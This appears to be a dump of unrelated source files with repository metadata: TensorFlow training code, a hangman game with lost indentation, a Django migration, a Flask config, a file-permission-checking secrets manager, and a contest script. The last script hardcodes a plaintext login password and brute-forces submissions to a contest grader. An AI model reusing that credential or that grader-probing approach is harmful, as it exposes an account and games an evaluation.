        train_loss_summary = tf.summary.scalar('training_loss', self.train_output['loss'])
        self.merged_train_summ = tf.summary.merge([L2_loss_summary, total_loss_summary, train_loss_summary])
        # epoch-level accuracies are computed in Python and fed via placeholders
        self.train_set_accuracy = tf.placeholder(dtype=tf.float32, name="train_set_accuracy")
        self.train_acc_summary = tf.summary.scalar('train_epoch_accuracy', self.train_set_accuracy)
        test_loss_summary = tf.summary.scalar('testing_loss', self.test_output['loss'])
        self.test_set_accuracy = tf.placeholder(dtype=tf.float32, name="test_set_accuracy")
        self.test_acc_summary = tf.summary.scalar('test_epoch_accuracy', self.test_set_accuracy)
        self.merged_test_summ = tf.summary.merge([test_loss_summary])

    def train(self):
        """Run the training loop: per-epoch train/test passes, summaries,
        halving learning-rate schedule, periodic and best-accuracy checkpoints."""
        config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
        with tf.Session(config=config) as sess:
            start_epoch = 0
            init = tf.global_variables_initializer()
            sess.run(init)
            # optionally resume from a saved checkpoint
            if(self.flags.is_load_model):
                self.saver.restore(sess, self.flags.model_path)
                start_epoch = self.flags.start_epoch
                print(self.flags.model_path)
                print("load model success!")
            train_writer = tf.summary.FileWriter(self.flags.summaries_dir + '/train', sess.graph)
            test_writer = tf.summary.FileWriter(self.flags.summaries_dir + '/test')
            best_acc = 0
            if not os.path.exists(self.flags.summaries_dir+'/ckpt'):
                os.mkdir(self.flags.summaries_dir+'/ckpt')
            if not os.path.exists(self.flags.summaries_dir+'/pred'):
                os.mkdir(self.flags.summaries_dir+'/pred')
                os.mkdir(self.flags.summaries_dir+'/logits')
            lr = self.flags.learning_rate
            for epoch_i in tqdm(range(start_epoch, start_epoch + self.flags.epoch_num)):
                # step schedule: halve the learning rate every decay_epoch
                # epochs until it drops below 1e-4
                if(epoch_i > 0 and epoch_i % self.flags.decay_epoch == 0 and lr>=1e-4):
                    lr = lr / 2
                print("\nepoch " + str(epoch_i) + " training:")
                print("learning rate: "+ str(lr))
                train_acc_sum = 0.0
                for iter_j in range(self.flags.train_size):
                    training_output, merged_sum, _ = sess.run([self.train_output, self.merged_train_summ, self.train_step], feed_dict={self.learning_rate: lr})
                    train_writer.add_summary(merged_sum, iter_j + self.flags.train_size * epoch_i)
                    train_acc_sum = train_acc_sum + training_output['accuracy'].sum() / len(training_output['accuracy'])
                print("epoch " + str(epoch_i) + " training acc:" + str(train_acc_sum / self.flags.train_size) + "\n")
                train_ave_acc = sess.run(self.train_acc_summary, feed_dict={self.train_set_accuracy: train_acc_sum / self.flags.train_size})
                train_writer.add_summary(train_ave_acc, epoch_i)
                # evaluation pass over the test set
                test_acc_sum = 0.0
                for iter_j in range(self.flags.test_size):
                    testing_output, test_summary = sess.run([self.test_output, self.merged_test_summ])
                    test_writer.add_summary(test_summary, iter_j + self.flags.test_size * epoch_i)
                    test_acc_sum = test_acc_sum + testing_output['accuracy'].sum() / len(testing_output['accuracy'])
                print("epoch " + str(epoch_i) + " testing acc:" + str(test_acc_sum / self.flags.test_size) + "\n")
                test_ave_acc = sess.run(self.test_acc_summary, feed_dict={self.test_set_accuracy: test_acc_sum / self.flags.test_size})
                test_writer.add_summary(test_ave_acc, epoch_i)
                # keep a separate checkpoint for the best test accuracy so far
                if(test_acc_sum / self.flags.test_size >= best_acc):
                    best_acc = test_acc_sum / self.flags.test_size
                    self.best_saver.save(sess, self.flags.summaries_dir+'/ckpt/' + self.flags.task + '_best.ckpt', global_step=epoch_i)
                if(epoch_i % self.flags.save_epoch == 0):
                    self.saver.save(sess, self.flags.summaries_dir+'/ckpt/' + self.flags.task + '.ckpt' , global_step=epoch_i)

    def test(self):
        """Restore a checkpoint and report accuracy on the train and test sets."""
        with tf.Session() as sess:
            self.saver.restore(sess, self.flags.model_path)
            print(self.flags.model_path)
            print("load model success!")
            train_acc_sum = 0.0
            for iter_j in range(self.flags.train_size):
                training_output = sess.run(self.train_output)
                train_acc_sum += training_output['accuracy'].sum() / len(training_output['accuracy'])
            print("training acc:" + str(train_acc_sum / self.flags.train_size) + "\n")
            test_acc_sum = 0.0
            for iter_j in range(self.flags.test_size):
                testing_output = sess.run(self.test_output)
                #np.savetxt(self.flags.summaries_dir+"/"+testing_output['name'].decode()+".txt", testing_output['predicted'], fmt="%d", delimiter="\n")
                #np.savetxt(self.flags.summaries_dir+"/"+testing_output['name'].decode()+"_max.txt", testing_output['logits'], fmt="%.6f", delimiter="\n")
                print(testing_output['name'].decode(), testing_output['accuracy'])
                test_acc_sum = test_acc_sum + testing_output['accuracy'].sum() / len(testing_output['accuracy'])
            print("testing acc:" + str(test_acc_sum / self.flags.test_size) + "\n")
print("testing acc:" + str(test_acc_sum / self.flags.test_size) + "\n")
| [
"v-yuqyan@microsoft.com"
] | v-yuqyan@microsoft.com |
47690046374fd174a6070576ac7812e7f43c6e1c | 3fb64f353604cd9e95d1bbda41c0692b246d806a | /hangman.py | 8face6e91cfe52b447bacd154bf7fedce7827e75 | [] | no_license | jamesthomaskerr/Lab9 | 4fe6e927dd900d5e6beaaff789ce523c5e6265e2 | daf4dc92400a6e338cc2dd5b7269f55b3455c861 | refs/heads/master | 2021-01-10T10:34:09.416257 | 2015-10-23T11:39:26 | 2015-10-23T11:39:26 | 44,809,636 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,690 | py | __author__ = 'James'
import random
def genRandomWord():
list_of_words = ["python", "jumble", "easy", "difficult", "answer", "xylophone"]
#word = random.choice(list_of_words)
word="difficult"
return word
def createCurrentBlank(word):
currentBlanks = len(word) * "_"
return currentBlanks
def printCurrentBlanks(currentBlanks):
for i in range(0,len(currentBlanks)):
print(currentBlanks[i],end=' ')
def guessALetter():
letter=input("Guess a letter: ")
return letter
def goodGuess(letter,word):
#returns true if letter is in word otherwise return false
match=False
for i in range(len(word)):
if word[i]==letter:
match=True
return match
def updateCurrentBlanks(letter,word,currentBlanks):
# check word for letter and replace blanks in currentBlacks with any matches
wordlist=list(word)
for i in range(len(wordlist)):
if letter == wordlist[i]:
currentBlanks = currentBlanks[:i] + wordlist[i] + currentBlanks[i+1:]
return currentBlanks
def printRules():
print('rules!')
def printLives(currentLives):
print(currentLives)
def main():
printRules()
word = genRandomWord()
currentBlanks = createCurrentBlank(word)
printCurrentBlanks(currentBlanks)
currentLives = 10
while currentLives > 0 and word != currentBlanks:
letter = guessALetter()
lastGuessGood = goodGuess(letter,word)
if lastGuessGood:
currentBlanks = updateCurrentBlanks(letter,word,currentBlanks)
else:
currentLives = currentLives - 1
printCurrentBlanks(currentBlanks)
printLives(currentLives)
main() | [
"jamesthomaskerr@gmail.com"
] | jamesthomaskerr@gmail.com |
249dd977b023e9bafd9974cc4cd185410ae66435 | d3154515510c47520164b48246021645b58d3652 | /aether-kernel/aether/kernel/api/migrations/0109_export_task.py | 2d21a17de506f5d6d6d0a68a2a974902d7a891d6 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | eHealthAfrica/aether | 391f675a0b85a78cd22391763d37343622696f97 | 2a4bf1b78d1bcb207af51dc06c6393ad78fe0291 | refs/heads/develop | 2023-05-25T11:56:37.971814 | 2023-03-31T07:37:07 | 2023-03-31T07:37:07 | 110,524,187 | 17 | 6 | Apache-2.0 | 2023-05-23T05:54:39 | 2017-11-13T08:59:49 | Python | UTF-8 | Python | false | false | 4,564 | py | # Generated by Django 2.2.7 on 2019-12-04 09:17
import aether.kernel.api.models
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import django_prometheus.models
import model_utils.fields
import uuid
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('kernel', '0108_submission_is_extracted'),
]
operations = [
migrations.AlterField(
model_name='attachment',
name='md5sum',
field=models.CharField(blank=True, editable=False, max_length=36, verbose_name='file MD5'),
),
migrations.CreateModel(
name='ExportTask',
fields=[
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(editable=False, verbose_name='name')),
('settings', django.contrib.postgres.fields.jsonb.JSONField(default=dict, editable=False, verbose_name='settings')),
('status_records', models.CharField(blank=True, editable=False, null=True, max_length=20, verbose_name='status records')),
('error_records', models.TextField(blank=True, editable=False, null=True, verbose_name='error records')),
('status_attachments', models.CharField(blank=True, editable=False, null=True, max_length=20, verbose_name='status attachments')),
('error_attachments', models.TextField(blank=True, editable=False, null=True, verbose_name='error attachments')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='tasks', to=settings.AUTH_USER_MODEL, verbose_name='Requested by')),
('project', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='tasks', to='kernel.Project', verbose_name='project')),
],
options={
'verbose_name': 'task',
'verbose_name_plural': 'tasks',
'ordering': ['project__id', '-modified'],
'default_related_name': 'tasks',
},
),
migrations.CreateModel(
name='ExportTaskFile',
fields=[
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(verbose_name='name')),
('file', models.FileField(editable=False, max_length=500, upload_to=aether.kernel.api.models.__task_path__, verbose_name='file')),
('md5sum', models.CharField(blank=True, editable=False, max_length=36, verbose_name='file MD5')),
('size', models.DecimalField(decimal_places=0, default=0, editable=False, max_digits=19, verbose_name='file size')),
('task', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='files', to='kernel.ExportTask', verbose_name='task')),
],
options={
'verbose_name': 'export file',
'verbose_name_plural': 'export files',
'ordering': ['task__id', 'name'],
'default_related_name': 'files',
},
),
migrations.AddIndex(
model_name='exporttaskfile',
index=models.Index(fields=['task', 'name'], name='kernel_expo_task_id_440af6_idx'),
),
migrations.AddIndex(
model_name='exporttask',
index=models.Index(fields=['project', '-modified'], name='kernel_expo_project_e19d66_idx'),
),
migrations.AddIndex(
model_name='exporttask',
index=models.Index(fields=['-modified'], name='kernel_expo_modifie_9b8dbe_idx'),
),
]
| [
"noreply@github.com"
] | eHealthAfrica.noreply@github.com |
9dc41bfe4a4c7783a9ec0d0b7eb8117aceae3978 | 946b7b64ee9eb1511f11890b3c69cf903d2982aa | /Course_03/Regular Expressions/analysis02.py | 464d833656003cf41089e8f37ae6f05f2ad652b3 | [] | no_license | srimani-programmer/Python-Specialization | 41342def0dab0c6641163f1e35cb1c9668a900a3 | 9a2a081549934ba2ce0f8b98edb3f27f5f880b59 | refs/heads/master | 2020-06-27T19:14:37.491119 | 2020-03-31T09:32:50 | 2020-03-31T09:32:50 | 200,027,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | import re
file_handle = open('mbox-test.txt')
# Printing the data starts with 'x'
count = 0
for data in file_handle:
lines = data.strip()
if re.search('^X.*:',lines):
# print(data)
count += 1
print(count)
file_handle.close() | [
"srimani.scholar@gmail.com"
] | srimani.scholar@gmail.com |
69c33361e23d0f8fc4c52f7b4df56e7d4a39a560 | bf591c979a30f3bcd07e91abe312a9de3fdc5595 | /config.py | ac06c1782e7734a2894a728da4cb9108388c8dc1 | [] | no_license | isayahc/flask_google_login | ef3e4f0fb071bbd5b6d4d5dbc6b680ff1750dae8 | fa2aeee34be8f7d2bf08fd8ff92df4ce4aa549e7 | refs/heads/main | 2023-01-07T17:38:46.159760 | 2020-11-09T19:39:21 | 2020-11-09T19:39:21 | 307,735,352 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,264 | py | """Flask configuration variables."""
# This is where you can change env
from os import environ, path
from dotenv import load_dotenv
basedir = path.abspath(path.dirname(__file__))
load_dotenv(path.join(basedir, ".env")) # use for different .envs
class Config:
"""Set Flask configuration from .env file."""
# General Config
SECRET_KEY = environ.get("SECRET_KEY")
FLASK_APP = environ.get("FLASK_APP")
FLASK_ENV = environ.get("FLASK_ENV")
# Database
SQLALCHEMY_DATABASE_URI = environ.get("SQLALCHEMY_DATABASE_URI")
SQLALCHEMY_ECHO = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
# Google API
GOOGLE_CLIENT_ID = environ.get("GOOGLE_CLIENT_ID")
GOOGLE_CLIENT_SECRET = environ.get("GOOGLE_CLIENT_SECRET")
class ProductionConfig(Config):
"""Set Flask configuration from .env file."""
# General Config
SECRET_KEY = environ.get("SECRET_KEY")
FLASK_APP = environ.get("FLASK_APP")
FLASK_ENV = environ.get("FLASK_ENV")
# Database
SQLALCHEMY_DATABASE_URI = environ.get("DATABASE_URL")
SQLALCHEMY_ECHO = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
# Google API
GOOGLE_CLIENT_ID = environ.get("GOOGLE_CLIENT_ID")
GOOGLE_CLIENT_SECRET = environ.get("GOOGLE_CLIENT_SECRET") | [
"isayahculbertson@gmail.com"
] | isayahculbertson@gmail.com |
29b5c3375aed49657686d4504ec68efa264fc82a | ca8b97d9b8e91c17dfacc8996002c387ee7dc6dd | /classfunction.py | e2404a46ff5f3f8cbbf506de40668194fd203420 | [] | no_license | sankaranarayanankj/python | 943404c49b26876890a2dbff550ad718dfe942dc | d5f3c3b6998f7e99cc8af0444ff67d7328804f9e | refs/heads/master | 2020-06-22T10:20:17.663186 | 2020-06-14T16:06:31 | 2020-06-14T16:06:31 | 197,697,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | class Employee:
def __init__(self):
self.emp_id=int(input("ID:"))
self.emp_name=(input("Name:"))
self.emp_des=(input("Desigination:"))
self.emp_sal=int(input("Salary:"))
def category(self):
if(self.emp_sal>=25000):
self.cat=" Class A"
elif(self.emp_sal>=20000 and self.emp_sal<=25000):
self.cat=" Class B"
elif(self.emp_sal>=15000 and self.emp_sal<=20000):
self.cat="Class C"
else:
self.cat="Class D"
obj.display_details()
def display_details(self):
print(self.emp_id,"<-->",self.emp_name,"<-->",self.emp_des,"<-->",self.emp_sal,"<-->",self.cat)
l=[]
x=int(input("Enter number of employees:"))
for i in range(x):
obj=Employee()
l.append(obj)
print("Dict---->",Employee.__dict__)
| [
"noreply@github.com"
] | sankaranarayanankj.noreply@github.com |
4e68987fe34097d952c5eba566bb259a07655076 | 2892731203f7b59faa8f5182b756c0b3575e796f | /cma/assim_secrets.py | c485a566344992c2d1fe735ef00077e3a91aa5c3 | [] | no_license | assimilation/assimilation-official | 1024b92badcbaf6b7c42f01f52e71c926a4b65f8 | 9ac993317c6501cb1e1cf09025f43dbe1d015035 | refs/heads/rel_2_dev | 2023-05-10T20:12:33.935123 | 2022-12-08T16:21:22 | 2022-12-08T16:21:22 | 42,373,046 | 52 | 17 | null | 2023-08-16T12:43:49 | 2015-09-12T21:04:36 | Python | UTF-8 | Python | false | false | 15,557 | py | #!/usr/bin/env python
# coding=utf-8
#
# vim: smartindent tabstop=4 shiftwidth=4 expandtab number colorcolumn=100
#
# This file is part of the Assimilation Project.
#
# Author: Alan Robertson <alanr@unix.sh>
# Copyright (C) 2017 - Assimilation Systems Limited
#
# Free support is available from the Assimilation Project community
# - http://assimproj.org
# Paid support may be available from Assimilation Systems Limited
# - http://assimilationsystems.com
#
# The Assimilation software is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The Assimilation software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the Assimilation Project software.
# If not, see http://www.gnu.org/licenses/
"""
This file provides secret management for the Assimilation project.
"""
import stat
import os.path
import pwd
import grp
import json
from AssimCtypes import CRYPTKEYDIR
class AssimSecret(object):
"""
This class is for providing secrets for the Assimilation code.
These things include credentials for Neo4j, and other credentials the software might need to
do its work.
"""
secret_subclasses = {}
_secret_info_map = {}
def __init__(self, secret_name, secret_parameters):
"""
Base class initialization for the AssimSecret base class
:param secret_name: str: the name of this secret
:param secret_parameters: list(str): - parameters for this subclass initializer
"""
self.secret_name = secret_name
self._secret_parameters = secret_parameters
self._update_functions = []
@classmethod
def register(cls, subclass):
"""
Register this class as a subclass of AssimSecret - used as a decorator
:param subclass: class: The subclass of AssimSecret we want to register as a constructor
:return: the constructed object
"""
assert issubclass(subclass, cls)
cls.secret_subclasses[subclass.__name__.lower()] = subclass
return subclass
@staticmethod
def factory(secret_name, **keywords):
"""
Implements the factory pattern for our secret types
:param secret_name: str: name of the secret we want to instantiate
:return: AssimSecret: (actually a subclass of AssimSecret)
"""
secret_info = AssimSecret._secret_info_map[secret_name]
secret_type = secret_info.get("type", "file").lower()
if secret_type not in AssimSecret.secret_subclasses:
secret_type += "secret"
return AssimSecret.secret_subclasses[secret_type](secret_name, secret_info, **keywords)
def get(self):
"""
Retrieve the value of our secret
:return: Union(str, bytes)
"""
raise NotImplementedError("%s.get() is an abstract method" % self.__class__.__name__)
def set(self, new_value):
"""
Update the value of our secret
:param new_value: The new value to set the secret to.
:return: None
"""
raise NotImplementedError("%s.set() is an abstract method" % self.__class__.__name__)
def add_update_function(self, update_function):
"""
Add a new update function to an AssimSecret object.
:param update_function: callable(secret_name, secret_parameters): function to add
:return: None
"""
self._update_functions.append(update_function)
def _perform_external_update(self):
"""
Utility function to perform all corresponding external updates when a secret is
(about to be) updated. This is intended to do things like propagate such a
change to Neo4j or other secret owners.
These functions are supplied through _add_update_function.
:return: bool: True if the external update process succeeded.
"""
if self._update_functions:
for fun in self._update_functions:
if not fun(self.secret_name, self._secret_parameters):
return False
else:
return True
@staticmethod
def set_secret_info_map(info_map):
"""
Set the secret info map for our secrets classes
:param info_map: dict(str: dict)
:return: None
"""
for secret_name in info_map:
parameters = info_map[secret_name]
if "type" not in parameters:
raise ValueError(
"Secret %s has no secret type in secret information map." % secret_name
)
if parameters["type"].lower() not in AssimSecret.secret_subclasses:
secret_type = parameters["type"].lower() + "secret"
if secret_type not in AssimSecret.secret_subclasses:
raise ValueError(
"Secret %s has an invalid secret type [%s] in secret information map."
% (secret_name, parameters["type"])
)
# Must be OK - or at least no egregious errors ;-)
AssimSecret._secret_info_map = info_map
@staticmethod
def set_secret_info_map_filename(file_name):
"""
Set our secret map info from a JSON-structured filename
:param file_name: Name of the file to read the JSON secret map from
:return: None
"""
with open(file_name) as map_fd:
AssimSecret.set_secret_info_map(json.loads(map_fd.read()))
@AssimSecret.register
class FileSecret(AssimSecret):
"""
A subclass for storing secrets in files
"""
DEFAULT_SECRET_DIR = CRYPTKEYDIR
uids = set()
gids = set()
def __init__(self, secret_name, secret_parameters):
"""
:param secret_name: str: name of this secret
:param secret_parameters: parameters for this secret
"""
AssimSecret.__init__(self, secret_name, secret_parameters)
self._temp_ok = secret_parameters.get("temp_ok", False)
@staticmethod
def set_uids_and_gids(uids=None, gids=None):
"""
Set the globally permissible set of user ids and group ids for files
that we check the permissions of
:param uids: a list of user ids - either numeric or strings
:param gids: a list of group ids - either numeric or strings
:return:
"""
FileSecret.uids = FileSecret.make_uids(uids) if uids else set()
FileSecret.gids = FileSecret.make_gids(gids) if gids else set()
print("UIDS: %s" % FileSecret.uids)
@staticmethod
def _check_full_path_permissions(file_name, file_read_only=True, temp_ok=False):
"""
Validate the file permissions of the file and all its parent directories.
:param file_name: str: name of the file we want to check the permissions of
:return: None
:raises: OSError: If permissions look wrong
"""
FileSecret._check_path_perms(file_name, read_only=file_read_only, temp_ok=temp_ok)
read_only = file_read_only
while True:
FileSecret._check_path_perms(file_name, read_only=read_only)
read_only = False
parent = os.path.dirname(file_name)
if parent == "" or parent == file_name:
break
file_name = parent
@staticmethod
def _check_path_perms(path_name, read_only=True, temp_ok=False):
"""
Check the permissions of this particular pathname
We enforce the following rules:
Must not be writable by group or other
if read_only: Must not be readable by group or other
:param path_name: str: the pathname we've been asked about
:param read_only: bool: True if the file must be read-only to everyone but owner
files must are always readable only by owner
:return: None
:raises: OSError: If the file doesn't exist or permissions look wrong
"""
stat_buffer = os.stat(path_name)
mode = stat_buffer.st_mode
if stat.S_ISLNK(mode):
link_path = os.readlink(path_name)
if not link_path.startswith("/"):
link_directory = os.path.dirname(path_name)
link_path = os.path.join(link_directory, link_path)
FileSecret._check_full_path_permissions(file_name=link_path)
return
if not (stat.S_ISDIR(mode) or stat.S_ISREG(mode)):
raise OSError('"%s" is not a file, directory or link' % path_name)
if not (temp_ok and path_name == "/tmp" or path_name == "/var/tmp" and mode & stat.S_ISVTX):
# That combination looks to see if it's under a temp dir which is marked sticky...
# this is useful for testing...
if mode & (stat.S_IWOTH | stat.S_IWGRP):
raise OSError('"%s" is writable by other or group' % path_name)
if read_only or stat.S_ISREG(mode):
if mode & (stat.S_IROTH | stat.S_IRGRP):
raise OSError('"%s" is readable by other or group' % path_name)
if FileSecret.uids and stat_buffer.st_uid not in FileSecret.uids:
raise OSError(
'user id %s is not a permissible owner for "%s". %s'
% (stat_buffer.st_uid, path_name, str(list(FileSecret.uids)))
)
if FileSecret.gids and stat_buffer.st_uid not in FileSecret.gids:
raise OSError(
'group id %s is not a permissible owner for "%s". %s'
% (stat_buffer.st_uid, path_name, str(list(FileSecret.gids)))
)
# Well, if we got this far, it must be OK :-)
@staticmethod
def make_uids(uids):
"""
Convert the arguments from user names to user ids
:param uids: list(union(str, int))
:return: list(int)
"""
ret_uids = []
for uid in uids:
if isinstance(uid, int):
ret_uids.append(uid)
else:
try:
ret_uids.append(pwd.getpwnam(uid).pw_uid)
except KeyError:
pass
return set(ret_uids)
@staticmethod
def make_gids(gids):
"""
Convert the arguments from group names to group ids
:param gids: list(union(str, int))
:return: list(int)
"""
ret_gids = []
for gid in gids:
if isinstance(gid, int):
ret_gids.append(gid)
else:
try:
ret_gids.append(grp.getgrnam(gid.gr_gid))
except KeyError:
pass
return set(ret_gids)
def get(self):
"""
Get the value of the secret
:return: str: value of secret [or other appropriate value ;-)]
:raises OSError: For a variety of reasons.
"""
file_name = self._secret_parameters.get("filename", self.secret_name)
if not file_name.startswith("/"):
file_name = os.path.join(self.DEFAULT_SECRET_DIR, file_name)
try:
self._check_full_path_permissions(file_name)
with open(file_name) as secret_fd:
return secret_fd.read()
except OSError as error:
raise OSError('FileSecret("%s"): %s.' % (self.secret_name, str(error)))
def set(self, new_value):
"""
Set the value of the file-stored secret...
:param new_value:
:return: None
"""
file_name = self._secret_parameters.get("filename", self.secret_name)
if not file_name.startswith("/"):
file_name = os.path.join(self.DEFAULT_SECRET_DIR, file_name)
try:
self._check_full_path_permissions(file_name)
with open(file_name, "w") as secret_fd:
if self._perform_external_update():
return secret_fd.write(new_value)
else:
raise RuntimeError(
'External secret update failed. Secret "%s" unchanged' % self.secret_name
)
except OSError as error:
raise OSError('FileSecret("%s"): %s.' % (self.secret_name, str(error)))
@AssimSecret.register
class Neo4jSecret(FileSecret):
"""
Class for the Neo4j password and so on as secrets...
"""
def __init__(self, secret_name, secret_parameters):
if secret_parameters is None:
secret_parameters = {}
if "filename" not in secret_parameters:
secret_parameters["filename"] = "neo4j.creds"
FileSecret.__init__(self, secret_name, secret_parameters)
self.add_update_function(Neo4jSecret._update_neo4j)
@staticmethod
def _update_neo4j(_secret_name, _secret_parameters):
"""
Tell neo4j to change their password.
FIXME: Actually do this work! :-D
:param _secret_name: str: not used
:param _secret_parameters: dict: not used
:return: bool
"""
# foo = secret_name + str(secret_parameters)
# return foo is foo
return True
def get(self):
"""
The Neo4j secret object returns a list of [login, password]
Since the last character in the file is a newline, it would like to
return a list of three items with the last one being an empty string.
We exclude the empty string from the return value, so you only
get two of them.
:return: [str, str] : [login-string, password-string]
"""
return [line for line in FileSecret.get(self).split("\n") if line]
if __name__ == "__main__":
print("doing stuff")
AssimSecret.set_secret_info_map(
{
"secret": {"type": "file", "filename": "/home/alanr/secret/secret"},
"not_secret": {"type": "file", "filename": "/home/alanr/secret/not_secret"},
"foobar": {"type": "file", "filename": "/home/alanr/secret/foobar"},
}
)
uid_list = ["alanr", "root", "sys", "bin", "adm"]
FileSecret.set_uids_and_gids(uid_list)
secret = AssimSecret.factory("secret")
print("GET: %s" % secret.get())
secret = AssimSecret.factory("not_secret")
try:
print("GET: %s" % secret.get())
except OSError as os_err:
if "is readable by" not in str(os_err):
print("Wrong error raised (%s)" % (str(os_err)))
else:
print("No error raised for not_secret file")
secret = AssimSecret.factory("foobar")
try:
print("GET: %s" % secret.get())
except OSError as os_err:
if "No such file or directory" not in str(os_err):
print("Wrong error raised (%s)" % (str(os_err)))
else:
print("No error raised for foobar file")
FileSecret.set_uids_and_gids(uids=("root", "bin", "adm"))
print("UIDS: %s" % FileSecret.uids)
secret = AssimSecret.factory("secret")
try:
print("GET: %s" % secret.get())
except OSError as os_err:
if "not a permissible owner" not in str(os_err):
print("Wrong error raised (%s)" % (str(os_err)))
else:
print("No owner error raised for secret file")
| [
"alanr@unix.sh"
] | alanr@unix.sh |
7d5305cd34ee140fc2bab55db7859ffacd8085f7 | ead7cbd52a274daa1d760ddb7903eb9ba6bde6af | /scripts/main_code.py | 39244b65301dad92426e66a8b526d785915f44f5 | [] | no_license | ngksg/Coursera_Capstone | 7ae09947b98ab52db8a2267075c05a416de43ed2 | 63d891940aea372c56384aea484feb9cb710b0e0 | refs/heads/main | 2023-06-25T07:03:31.084679 | 2021-07-29T07:01:58 | 2021-07-29T07:01:58 | 389,881,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py |
cases = [100,200,400,500]
import pandas as pd
import Numpy as np
print("test")
print("test2")
| [
"ngksg@hotmail.com"
] | ngksg@hotmail.com |
015cc7108b94acdc1865bf5881797c8d359b9214 | 3b6677b0be8e0e24939e48f0cd346e0022df9013 | /api/app.py | 3c4b8838addec446cfc8b6e4b17c9b5187b9f1e7 | [] | no_license | Pratheebhak/biotag | fc00707f57c1fa5789117d383d3c830adb88d7b8 | 14521b2687011927b016f7eebef12f145b4fa894 | refs/heads/master | 2023-01-07T13:21:18.205479 | 2020-11-02T19:30:38 | 2020-11-02T19:30:38 | 297,431,778 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | """ API for the model """
from flask import Flask, request, jsonify
# Create a Flask API
app = Flask(__name__)
app.config["DEBUG"] = True
# Create Routes
@app.route('/', methods=['GET'])
def home():
return "<h1>Handwritten Label Extraction on Botanical Images</h1>"
if __name__ = '__main__':
app.run() | [
"pratheebha11@gmail.com"
] | pratheebha11@gmail.com |
0a7f5bc245d7a0b1e7ff8dee61d3c6b185e1ebf3 | 139af68b78734a6bc53bd942ffa05476baf3d71d | /Python Fundamentals 2020 - 2021/13 - TEXT PROCESSING/More exercise - 13 - 05.py | 5a2252209bfb53e58143d4c6eca76fe595a218b6 | [] | no_license | MiroVatov/Python-SoftUni | 7fe3fc0a3928848c5317fb120f789c773bfc117e | 0d0d6f116281b4de8c413d254386e27d992d047b | refs/heads/main | 2023-08-24T09:44:31.261137 | 2021-10-18T14:04:03 | 2021-10-18T14:04:03 | 317,510,574 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | title_of_an_article = input()
print(f"<h1>")
print(title_of_an_article)
print(f"</h1>")
content_of_the_article = input()
print(f"<article>")
print(content_of_the_article)
print(f"</article>")
while True:
comment = input()
if comment == "end of comments":
break
print(f"<div>")
print(comment)
print(f"</div>") | [
"noreply@github.com"
] | MiroVatov.noreply@github.com |
af39c0109974dc34aed68d14d3ce5567d0a67d52 | 8bae0a5871f081f88f6bae1448f0a61653f1cad3 | /PROCO15/BalancePendulum/BalancePendulum.py | 400ed4d95136feae429cbd77eb8d28c931008ef4 | [] | no_license | IamUttamKumarRoy/contest-programming | a3a58df6b6ffaae1947d725e070d1e32d45c7642 | 50f2b86bcb59bc417f0c9a2f3f195eb45ad54eb4 | refs/heads/master | 2021-01-16T00:28:53.384205 | 2016-10-01T02:57:44 | 2016-10-01T02:57:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,960 | py | import requests
import time
s = requests.Session()
def submit(val) :
url = "http://proco2015-r2-890298229.us-west-1.elb.amazonaws.com/tasks/pendulum/submit"
files = {"actions.txt": val}
s.post(url, files=files)
def start_session() :
global s
data = {"username": "ecnerwal", "password" : "PfCazJAD"}
url = "http://proco2015-r2-890298229.us-west-1.elb.amazonaws.com/login"
s.post(url, data=data)
def gen_string(d, t1, t2, t3, t4) :
res = ""
for ang in range(-90, 91):
for vel in range(-30, 30):
right = False
if(vel == 0 and ang == 0) :
right = (d == 1)
elif(abs(vel) == 0) :
right = (ang > 0)
elif(abs(vel) == 1) :
if(abs(ang) >= t1) :
right = (ang > 0)
else:
right = (vel > 0)
elif(abs(vel) == 2) :
if(abs(ang) >= t2) :
right = (ang > 0)
else:
right = (vel > 0)
elif(abs(vel) == 3) :
if(abs(ang) >= t3) :
right = (ang > 0)
else:
right = (vel > 0)
elif(abs(vel) == 4) :
if(abs(ang) >= t4) :
right = (ang > 0)
else:
right = (vel > 0)
else:
right = vel > 0
res = "{}{} {} {}\n".format(res, ang + 90, vel, 'R' if right else 'L')
return res
def main() :
start_session()
for t4 in range(11, 13):
for t3 in range(6, 13):
for t2 in range(6, 13):
for t1 in range(6, 13):
for d in range(2) :
if(t1 <= t2 and t2 <= t3 and t3 <= t4):
submit(gen_string(d, t1, t2, t3, t4))
